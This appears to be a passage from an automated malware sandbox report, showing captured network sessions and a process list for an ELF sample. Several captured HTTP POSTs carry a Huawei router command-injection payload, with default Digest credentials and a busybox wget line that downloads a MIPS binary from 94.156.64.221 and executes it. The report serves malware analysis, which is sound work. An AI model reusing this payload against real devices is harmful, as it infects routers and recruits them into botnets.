                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    699192.168.2.2356528197.200.184.18137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.308485031 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    700192.168.2.235203241.32.190.15337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.308506012 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    701192.168.2.2335508156.141.78.17037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.308532953 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    System Behavior

                    Start time (UTC):16:15:50
                    Start date (UTC):01/06/2024
                    Path:/tmp/t9lNEiD3ui.elf
                    Arguments:/tmp/t9lNEiD3ui.elf
                    File size:4139976 bytes
                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                    Start time (UTC):16:15:50
                    Start date (UTC):01/06/2024
                    Path:/tmp/t9lNEiD3ui.elf
                    Arguments:-
                    File size:4139976 bytes
                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                    Start time (UTC):16:15:50
                    Start date (UTC):01/06/2024
                    Path:/tmp/t9lNEiD3ui.elf
                    Arguments:-
                    File size:4139976 bytes
                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                    Start time (UTC):16:15:50
                    Start date (UTC):01/06/2024
                    Path:/tmp/t9lNEiD3ui.elf
                    Arguments:-
                    File size:4139976 bytes
                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                    Start time (UTC):16:15:50
                    Start date (UTC):01/06/2024
                    Path:/tmp/t9lNEiD3ui.elf
                    Arguments:-
                    File size:4139976 bytes
                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                    Start time (UTC):16:15:50
                    Start date (UTC):01/06/2024
                    Path:/tmp/t9lNEiD3ui.elf
                    Arguments:-
                    File size:4139976 bytes
                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                    Start time (UTC):16:15:50
                    Start date (UTC):01/06/2024
                    Path:/tmp/t9lNEiD3ui.elf
                    Arguments:-
                    File size:4139976 bytes
                    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                    Start time (UTC):16:15:55
                    Start date (UTC):01/06/2024
                    Path:/usr/bin/xfce4-panel
                    Arguments:-
                    File size:375768 bytes
                    MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                    Start time (UTC):16:15:55
                    Start date (UTC):01/06/2024
                    Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                    Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
                    File size:35136 bytes
                    MD5 hash:ac0b8a906f359a8ae102244738682e76

                    Start time (UTC):16:15:55
                    Start date (UTC):01/06/2024
                    Path:/usr/bin/xfce4-panel
                    Arguments:-
                    File size:375768 bytes
                    MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                    Start time (UTC):16:15:55
                    Start date (UTC):01/06/2024
                    Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                    Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                    File size:35136 bytes
                    MD5 hash:ac0b8a906f359a8ae102244738682e76

                    Start time (UTC):16:15:55
                    Start date (UTC):01/06/2024
                    Path:/usr/bin/xfce4-panel
                    Arguments:-
                    File size:375768 bytes
                    MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                    Start time (UTC):16:15:55
                    Start date (UTC):01/06/2024
                    Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                    Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                    File size:35136 bytes
                    MD5 hash:ac0b8a906f359a8ae102244738682e76

                    Start time (UTC):16:15:55
                    Start date (UTC):01/06/2024
                    Path:/usr/bin/xfce4-panel
                    Arguments:-
                    File size:375768 bytes
                    MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                    Start time (UTC):16:15:55
                    Start date (UTC):01/06/2024
                    Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                    Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                    File size:35136 bytes
                    MD5 hash:ac0b8a906f359a8ae102244738682e76

                    Start time (UTC):16:16:01
                    Start date (UTC):01/06/2024
                    Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                    Arguments:-
                    File size:35136 bytes
                    MD5 hash:ac0b8a906f359a8ae102244738682e76

                    Start time (UTC):16:16:01
                    Start date (UTC):01/06/2024
                    Path:/usr/sbin/xfpm-power-backlight-helper
                    Arguments:/usr/sbin/xfpm-power-backlight-helper --get-max-brightness
                    File size:14656 bytes
                    MD5 hash:3d221ad23f28ca3259f599b1664e2427

                    Start time (UTC):16:15:55
                    Start date (UTC):01/06/2024
                    Path:/usr/bin/xfce4-panel
                    Arguments:-
                    File size:375768 bytes
                    MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                    Start time (UTC):16:15:55
                    Start date (UTC):01/06/2024
                    Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                    Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                    File size:35136 bytes
                    MD5 hash:ac0b8a906f359a8ae102244738682e76

                    Start time (UTC):16:15:55
                    Start date (UTC):01/06/2024
                    Path:/usr/bin/xfce4-panel
                    Arguments:-
                    File size:375768 bytes
                    MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                    Start time (UTC):16:15:55
                    Start date (UTC):01/06/2024
                    Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                    Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
                    File size:35136 bytes
                    MD5 hash:ac0b8a906f359a8ae102244738682e76

                    Start time (UTC):16:16:01
                    Start date (UTC):01/06/2024
                    Path:/usr/bin/dbus-daemon
                    Arguments:-
                    File size:249032 bytes
                    MD5 hash:3089d47e3f3ab84cd81c48fd406d7a8c

                    Start time (UTC):16:16:01
                    Start date (UTC):01/06/2024
                    Path:/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
                    Arguments:/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
                    File size:112880 bytes
                    MD5 hash:4c7a0d6d258bb970905b19b84abcd8e9

                    Start time (UTC):16:16:05
                    Start date (UTC):01/06/2024
                    Path:/usr/lib/systemd/systemd
                    Arguments:-
                    File size:1620224 bytes
                    MD5 hash:9b2bec7092a40488108543f9334aab75

                    Start time (UTC):16:16:05
                    Start date (UTC):01/06/2024
                    Path:/usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd
                    Arguments:/usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd
                    File size:112872 bytes
                    MD5 hash:eee956f1b227c1d5031f9c61223255d1